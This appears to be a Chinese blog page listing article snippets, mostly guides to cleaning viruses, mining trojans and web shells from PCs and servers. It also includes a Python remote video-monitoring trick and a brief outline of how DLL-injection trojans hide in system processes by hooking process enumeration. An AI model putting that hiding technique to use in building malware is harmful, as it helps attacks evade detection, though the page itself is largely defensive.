  摘要: 从网上看到过用python远程发送截图的博客,这次我要用python实现远程视频监控,看起来既高大上,做起来又非常简单。先说一说整体思路,我们要做到手机发送邮件,python脚本接收到有特定邮件的信息,模拟鼠标操作点击qq上的视频通话按钮以达到视频监控的目的。   我们需要两个qq号,一个在电脑端登陆,一个在手机端登陆,python脚本需要的账号和密码是你电脑端的。...
彻底清除SMSS.EXE病毒
1   概述: SMSS.EXE(Session Manag
u盘文件被病毒隐藏解决方案
最近,我好多同学U盘文件被病毒隐藏,明明U盘的空间被占用就是一直找不到文件,怎么办?给大家介绍一个工具diskgenius x64.exe 大家通过这个工具可以查看到被隐藏的文件,然后把文件拷贝出来再格式化你的U盘,再把拷贝出来的文件在放入U盘就可以了O(∩_∩)O~~
360卫士监测出APP有木马问题
自己开发的APP安装时,手机360安全卫士提示有木马病毒问题。
记一次服务器被植入挖矿木马CPU飙升200%解决过程!
来源 | 个人博客 | 作者 | liugh_develop线上服务器用的是某讯云的,欢快的完美运行着Tomcat,MySQL,MongoDB,ActiveMQ等程序。突然一则噩耗从前线传来:网站不能访问了!此项目是我负责,我以150+的手速立即打开了服务器,看到Tomcat挂了,然后顺其自然的重启,启动过程中直接被killed,再试试数据库,同样没成功,多次尝试甚至重启机器无果。机制的我打了个t
阿里云服务器中挖矿木马处理过程
在阿里云租用一台服务器,最近发现被异地登陆,紧接着出现异常下载。登陆服务器,发现CPU达100%,并且安骑士提示有挖矿进程。因为对linux系统不是很熟悉,故而边找资料边处理实验,最后记录下来以便日后处理备查。首先登陆服务器,使用top命令查看进程:CPU飙到100%,按CPU消耗排序,排在第一的是一个名为“imWBR1”的进程,查了一下是一个挖矿木马,首先比较直观的是imWBR1这个进程,查找它
photo.scr病毒清除工具
photo.scr
挖矿病毒排查
四、挖矿恶意程序处理流程 4.1 异常问题定位 4.1.1 异常进程排查 (1)top 排查 使用top命令直接动态排查可能异常进程,配合 -c可以直接查找到异常进程的物理位置。 1. # top -c (2)ps -ef 排查 # ps -ef |grep wnTKYg ps -ef |grep ddg.2021 (3) 疑似进程定位 [root@localhost ~]# f...
DLL木马
DLL木马线程注入木马也算是个不太新的方式了,但是在当时一度成为了恐慌.因为在进程中隐藏,而所注入的进程又是系统关键进程,无法终止.至于其他的木马神马神马吧,都是浮云. 木马运行关键是隐藏,神不知鬼不觉才是王道.要隐藏,先要隐藏进程,Windows操作系统中程序以进程的方式运行,大多数操作系统也是如此.任务管理器就可以看到当前运行的进程,所以有人HOOK相关枚举进程的函数,让任务管理
解决redis中的pnscan木马入侵问题
1、杀掉进程     top 找到pnscan 的pid     kill -9 pid2、删除文件     找到进程对应的文件 ps aux|grep pnscan      删掉文件。注:redis启动一定要设置密码。在redis.conf 中 requirepass XXX...
简单方法删除spoolsv.exe病毒
         无意间利用“恶意软件清理助手”检查系统的时候,发现竟然感染了spoolsv病毒,居然无法清理,总是有残余文件未被清理,于是上google搜,结果发现这个病毒的删除方法有很多种,尝试了几种后发现效果不是很好,而且有的方法竟然巨麻烦。没有办法只好自己想办法了, 结果被我发现一个简单的方法,问题解决 :)        首先在被感染的及其上会发现多处几个目录
LINUX web服务器首次被攻击(PHP木马怎么被挂进来的)解决思路
1.通过分析WEB日志并结合其他一些线索来对攻击者进行追踪。 2.马上修改文件权限,尽可能小。   修改后台帐号密码。修改mysql管理密码。修改ftp帐号密码。加固防火墙。查看linux用户,删除或锁住无用的用户。 3.搜索PHP中的挂马文件(搜索方法在其他文章)。删除。必须要找到位置。因为即使知道黑客怎么进来的,也不知道木马在哪里,黑客可以通过一个程序漏洞,去修改其他程序
关闭
关闭